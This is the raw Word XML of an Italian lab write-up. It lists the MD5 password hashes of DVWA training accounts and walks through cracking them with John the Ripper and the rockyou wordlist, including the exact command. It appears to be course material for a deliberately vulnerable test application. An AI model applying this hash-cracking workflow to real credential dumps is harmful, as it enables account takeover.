        <w:tblW w:w="0" w:type="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4814"/>
        <w:gridCol w:w="4814"/>
      </w:tblGrid>
      <w:tr w:rsidR="008F2B93" w:rsidRPr="00B34E8B" w14:paraId="041B270F" w14:textId="77777777" w:rsidTr="008F2B93">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4814" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="4AC89ADD" w14:textId="21050EDA" w:rsidR="008F2B93" w:rsidRPr="00B34E8B" w:rsidRDefault="008F2B93" w:rsidP="006C15DF">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B34E8B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Username</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4814" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="0CE9E5A2" w14:textId="40D64112" w:rsidR="008F2B93" w:rsidRPr="00B34E8B" w:rsidRDefault="008F2B93" w:rsidP="006C15DF">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B34E8B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Password in </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B34E8B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>ascii</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008F2B93" w:rsidRPr="00B34E8B" w14:paraId="0ECCD8B0" w14:textId="77777777" w:rsidTr="008F2B93">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4814" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="20B62E90" w14:textId="1749FE6D" w:rsidR="008F2B93" w:rsidRPr="00B34E8B" w:rsidRDefault="008F2B93" w:rsidP="006C15DF">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B34E8B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4814" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="08250210" w14:textId="30C02473" w:rsidR="008F2B93" w:rsidRPr="00B34E8B" w:rsidRDefault="008F2B93" w:rsidP="006C15DF">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B34E8B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>5f4dcc3b5aa765d61d8327deb882cf99</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008F2B93" w:rsidRPr="00B34E8B" w14:paraId="30B3BAA5" w14:textId="77777777" w:rsidTr="008F2B93">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4814" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="63A1863E" w14:textId="51060F84" w:rsidR="008F2B93" w:rsidRPr="00B34E8B" w:rsidRDefault="008F2B93" w:rsidP="006C15DF">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B34E8B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>gordonb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4814" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="46A7DC1A" w14:textId="1EE83BCA" w:rsidR="008F2B93" w:rsidRPr="00B34E8B" w:rsidRDefault="008F2B93" w:rsidP="006C15DF">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B34E8B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>e99a18c428cb38d5f260853678922e03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008F2B93" w:rsidRPr="00B34E8B" w14:paraId="64C7D5BE" w14:textId="77777777" w:rsidTr="008F2B93">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4814" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="7A0C26AD" w14:textId="3F57D9DB" w:rsidR="008F2B93" w:rsidRPr="00B34E8B" w:rsidRDefault="008F2B93" w:rsidP="006C15DF">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B34E8B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1337</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4814" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="3F34B9C7" w14:textId="760A5727" w:rsidR="008F2B93" w:rsidRPr="00B34E8B" w:rsidRDefault="008F2B93" w:rsidP="006C15DF">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B34E8B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>8d3533d75ae2c3966d7e0d4fcc69216b</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008F2B93" w:rsidRPr="00B34E8B" w14:paraId="77F7100E" w14:textId="77777777" w:rsidTr="008F2B93">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4814" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="75B1B7C7" w14:textId="520528A0" w:rsidR="008F2B93" w:rsidRPr="00B34E8B" w:rsidRDefault="008F2B93" w:rsidP="006C15DF">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B34E8B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>pablo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4814" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="3DE43CA3" w14:textId="329BC673" w:rsidR="008F2B93" w:rsidRPr="00B34E8B" w:rsidRDefault="008F2B93" w:rsidP="006C15DF">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B34E8B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>0d107d09f5bbe40cade3de5c71e9e9b7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008F2B93" w:rsidRPr="00B34E8B" w14:paraId="086DE81E" w14:textId="77777777" w:rsidTr="008F2B93">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4814" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="689F45F4" w14:textId="3FDDD2C7" w:rsidR="008F2B93" w:rsidRPr="00B34E8B" w:rsidRDefault="008F2B93" w:rsidP="006C15DF">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B34E8B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>smithy</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4814" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="414B7FAD" w14:textId="020BEFE5" w:rsidR="008F2B93" w:rsidRPr="00B34E8B" w:rsidRDefault="008F2B93" w:rsidP="006C15DF">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B34E8B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>5f4dcc3b5aa765d61d8327deb882cf99</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="657432F0" w14:textId="1EFEDF76" w:rsidR="00802C4B" w:rsidRPr="00B34E8B" w:rsidRDefault="00802C4B" w:rsidP="006C15DF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="130087ED" w14:textId="77777777" w:rsidR="003E728E" w:rsidRPr="00B34E8B" w:rsidRDefault="003E728E" w:rsidP="003E728E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Una volta raccolte le password crittografate, il passo successivo sarà quello di decrittografarle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CF7F59" w14:textId="6824204D" w:rsidR="008F2B93" w:rsidRPr="00B34E8B" w:rsidRDefault="003E728E" w:rsidP="003E728E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Per fare ciò, verrà utilizzato un tool automatico già preinstallato in Kali, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>John the Ripper.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF81857" w14:textId="591BAF76" w:rsidR="003E728E" w:rsidRPr="00B34E8B" w:rsidRDefault="003E728E" w:rsidP="003E728E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Le password cifrate riportate sopra verranno inserite innanzitutto all’interno di un file .txt</w:t>
      </w:r>
      <w:r w:rsidR="00F725A6" w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, così da poter creare un dizionario, che poi andrà confrontato con la lista già predefinita in Kali </w:t>
      </w:r>
      <w:r w:rsidR="00F725A6" w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00F725A6" w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rockyou.txt.gz”</w:t>
      </w:r>
      <w:r w:rsidR="00F725A6" w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0313A44A" w14:textId="2FB2F2F3" w:rsidR="00F725A6" w:rsidRPr="00B34E8B" w:rsidRDefault="00F725A6" w:rsidP="003E728E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>In questo caso il file creato per contenere le password e gli username di DVWA si chiama “</w:t>
      </w:r>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hash2.txt”</w:t>
      </w:r>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1F2C77" w14:textId="41C201FD" w:rsidR="00F725A6" w:rsidRPr="00B34E8B" w:rsidRDefault="00F725A6" w:rsidP="003E728E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Di seguito vediamo il primo passaggio di ricerca della </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>wordlist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> più adatta, in questo caso “</w:t>
      </w:r>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rockyou.txt.gz”</w:t>
      </w:r>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD31044" w14:textId="60D04029" w:rsidR="00F725A6" w:rsidRPr="00B34E8B" w:rsidRDefault="002E13B1" w:rsidP="003E728E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Aprendo il file, si ha evidenza di come al suo interno </w:t>
      </w:r>
      <w:r w:rsidR="00DC0D73" w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">si trovi un file completamente scritto in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ascii</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306C43CB" w14:textId="77777777" w:rsidR="00F725A6" w:rsidRPr="00B34E8B" w:rsidRDefault="00F725A6" w:rsidP="003E728E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04E6E96A" w14:textId="0E2AF833" w:rsidR="00F725A6" w:rsidRPr="00B34E8B" w:rsidRDefault="00F725A6" w:rsidP="003E728E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21807B65" wp14:editId="2F60069A">
            <wp:extent cx="4290432" cy="3322608"/>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290432" cy="3322608"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="388CB15D" w14:textId="478D14F2" w:rsidR="00EF3FAD" w:rsidRPr="00B34E8B" w:rsidRDefault="00EF3FAD" w:rsidP="006C15DF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Individuata la lista da utilizzare e creato il dizionario, si può passare all’utilizzo vero e proprio del tool “John the Ripper”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A695219" w14:textId="347EDC91" w:rsidR="00EF3FAD" w:rsidRPr="00B34E8B" w:rsidRDefault="00EF3FAD" w:rsidP="006C15DF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Avviando il tool da riga di comando, andremo poi ad inserire il comando da eseguire per decrittare le password e visualizzarle in chiaro.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303B6235" w14:textId="77777777" w:rsidR="00AE502D" w:rsidRDefault="00EF3FAD" w:rsidP="006C15DF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Il comando utilizzato è: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E070DC" w14:textId="4455F240" w:rsidR="00EF3FAD" w:rsidRPr="00B34E8B" w:rsidRDefault="00EF3FAD" w:rsidP="006C15DF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>john</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> –format=raw-md5 -- /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/share/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>wordlists</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/rockyou.txt.gz hash2.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C463E13" w14:textId="548E5F49" w:rsidR="00EF3FAD" w:rsidRPr="00B34E8B" w:rsidRDefault="00EF3FAD" w:rsidP="006C15DF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">In questo comando andremo ad esplicitare il formato </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dell’asci</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> da decrittare (</w:t>
      </w:r>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MD5</w:t>
      </w:r>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">) e il </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>path</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> della </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>wordlist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> che poi andrà confrontata con il file creato (“</w:t>
      </w:r>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hash2.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072152B2" w14:textId="17E8E485" w:rsidR="00EF3FAD" w:rsidRPr="00B34E8B" w:rsidRDefault="00EF3FAD" w:rsidP="006C15DF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Di seguito i passaggi effettuati e la visualizzazione delle password in chiaro.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9380CE" w14:textId="0F76B631" w:rsidR="00EF3FAD" w:rsidRPr="00B34E8B" w:rsidRDefault="00EF3FAD" w:rsidP="006C15DF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58382E5F" wp14:editId="294FCFDA">
            <wp:extent cx="6120130" cy="24244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2424430"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFC615D" w14:textId="2EE9FE4E" w:rsidR="00802C4B" w:rsidRDefault="00EF3FAD" w:rsidP="006C15DF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Come si può notare, affianco ad ogni u</w:t>
      </w:r>
      <w:r w:rsidR="00AF5917" w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sername</w:t>
      </w:r>
      <w:r w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> troveremo la password </w:t>
      </w:r>
      <w:r w:rsidR="00AF5917" w:rsidRPr="00B34E8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>corrispondente per ogni utente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CDB114" w14:textId="77777777" w:rsidR="00C40493" w:rsidRPr="00B34E8B" w:rsidRDefault="00C40493" w:rsidP="006C15DF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
